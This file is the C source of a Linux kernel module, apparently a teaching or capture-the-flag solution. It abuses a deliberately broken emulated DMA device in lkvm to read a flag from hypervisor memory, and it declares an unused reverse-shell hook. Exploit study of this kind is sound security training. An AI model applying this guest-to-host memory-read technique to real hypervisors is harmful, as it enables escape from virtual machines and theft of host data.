#include <linux/module.h>
#include <linux/slab.h>
#include <linux/dma-mapping.h>
#include <asm/io.h>

MODULE_LICENSE("Dual BSD/GPL");
extern unsigned long system;
extern void revshell(void);

unsigned long const guestmem = 0x7fffe3dab000;
unsigned long const flag_ptr = 0x55555559df40;

/* these come from the definition of the 'broken' device */
#define BROKEN_BASE	0x100
#define	BROKEN_SNR	(BROKEN_BASE + 0)
#define BROKEN_CMD	(BROKEN_BASE + 4)
#define BROKEN_LOMEM	(BROKEN_BASE + 8)
#define BROKEN_HIMEM	(BROKEN_BASE + 12)
#define BROKEN_DMA_OUT	2
#define BROKEN_DMA_IN	1
#define BROKEN_SECSZ	512

/* we install and trigger the exploit when the module is loaded, so we write
 * everything in the exploit_init() function.
 */
static int exploit_init(void) {
	char *buf;
	unsigned long bufaddr;
	unsigned long target;
       
	/* we allocate a buffer to hold the sector that we are going to read
	 * and write from the broken device. We allocate it on the kernel heap
	 * with kmalloc(). This function will give us a guest virtual address in
	 * 'direct mapped' region of the guest kernel virtual memory. These
	 * addresses can be converted to guest physical addresses by just subtracting
	 * a constant (by using the virt_to_phys() convenience function)
	 */
	buf = kmalloc(BROKEN_SECSZ, GFP_KERNEL);
	if (buf == NULL) {
		printk("out of memory\n");
		return 1;
	}
	bufaddr = virt_to_phys(buf);

	target = flag_ptr - guestmem;
	/* to read the memory we need to order two operations: first a DMA OUT from
	 * lkvm memory to a sector of the emulated device, and then a DMA IN from
	 * that same sector to our 'buf'
	 *
	 * We use sector number 0, but any sector will do equally well.
	 */
	outl(0, BROKEN_SNR);
	/* the source of the DMA operation is the fake 'target' address */
	outl(target, BROKEN_LOMEM);
	outl(target >> 32, BROKEN_HIMEM);
	outl(BROKEN_DMA_OUT, BROKEN_CMD);

	/* now the contents of the hypervisor memory is in sector 0, we just need to
	 * read it into buf. This is a normal DMA operation, from a device sector
	 * to our guest physical memory.
	 *
	 * Note that there is no need to write into SNR, since it already contains
	 * the sector number from the previous operation.
	 */
	outl(bufaddr, BROKEN_LOMEM);
	outl(bufaddr >> 32, BROKEN_HIMEM);
	outl(BROKEN_DMA_IN, BROKEN_CMD);

	/* the flag should be at the beginning of buf */
	printk("flag: %s\n", (char *)buf);

	return 0;
}

static void exploit_exit(void) {
}

module_init(exploit_init);
module_exit(exploit_exit);
